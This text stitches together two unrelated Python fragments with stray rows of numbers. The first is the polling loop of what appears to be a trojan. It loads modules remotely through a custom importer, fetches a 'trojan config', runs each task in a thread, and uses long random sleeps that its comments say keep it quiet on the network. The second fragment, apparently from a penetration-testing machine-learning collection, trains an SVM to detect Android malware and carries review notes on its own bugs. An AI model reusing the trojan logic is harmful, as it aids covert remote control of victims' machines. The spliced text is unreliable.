# (a) when no worker is busy, refresh the task list and launch one thread
# per task with a small random stagger, and (b) sleep a long random interval
# between polls to stay quiet on the wire.
sys.meta_path = [GitImporter()]
while True:
    if task_queue.empty():
        config = get_trojan_config()
        for task in config:
            t = threading.Thread(target=module_runner,args=(task['module'],))
            t.start()
            # stagger thread start-up to avoid a burst of traffic
            time.sleep(random.randint(1,10))
    # NOTE(review): this sleeps 1000-10000 seconds (~17 min - 2.8 h) between
    # polls — confirm seconds (not ms) is intended.
    time.sleep(random.randint(1000,10000))
| 21.438462 | 77 | 0.566529 |
Mastering-Machine-Learning-for-Penetration-Testing |
from sklearn.feature_selection import mutual_info_classif
from sklearn import preprocessing
import numpy as np
from sklearn.svm import SVC, LinearSVC
from sklearn import svm
import csv
import random
# Train/test split ratio: 70% of the shuffled rows are used for training.
PRatio = 0.7
# Load the whole CSV into memory and shuffle the rows.
# NOTE(review): if the CSV has a header row it is shuffled in with the data —
# confirm the file is header-less.
Dataset = open('Android_Feats.csv')
Reader = csv.reader(Dataset)
Data = list(Reader)
Data = random.sample(Data, len(Data))
Data = np.array(Data)
Dataset.close()
# Last column is the class label; the rest are features.
cols = np.shape(Data)[1]
Y = Data[:,cols-1]
Y = np.array(Y)
Y = np.ravel(Y,order='C')
X = Data[:,:cols-1]
X = X.astype(np.float)
# Standardize features to zero mean / unit variance.
X = preprocessing.scale(X)
# NOTE(review): this reads whole *lines* of the CSV as "feature names";
# for column names it should presumably split the header row on commas —
# verify against the actual file layout.
Features = [i.strip() for i in open("Android_Feats.csv").readlines()]
Features = np.array(Features)
# Rank features by mutual information with the label and keep the top 50.
# NOTE(review): selection is computed on the full dataset before the
# train/test split, which leaks test information into feature selection.
MI= mutual_info_classif(X,Y)
Featureind = sorted(range(len(MI)), key=lambda i: MI[i], reverse=True)[:50]
SelectFeats = Features[Featureind]
# Split rows into train/test partitions using only the selected features.
PRows = int(PRatio*len(Data))
TrainD = X[:PRows,Featureind]
TrainL = Y[:PRows]
TestD = X[PRows:,Featureind]
TestL = Y[PRows:]
# Fit an RBF-kernel SVM (library defaults) and report test accuracy in %.
clf = svm.SVC()
clf.fit(TrainD,TrainL)
score = clf.score(TestD,TestL)
print (score * 100)
| 21.590909 | 75 | 0.715005 |